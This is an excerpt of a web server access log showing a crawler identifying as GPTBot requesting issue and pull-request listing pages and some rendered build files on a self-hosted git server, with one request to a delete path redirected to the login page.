"https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:19:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11313] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:19:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11356] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:19:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:25:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" -[17/Feb/2026:19:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/dist/PostgresPatrol.exe" -[17/Feb/2026:19:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?state=open&type=all" [Client 74.7.227.38] [Length 9951] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:19:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" -[17/Feb/2026:19:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 11078] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:19:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 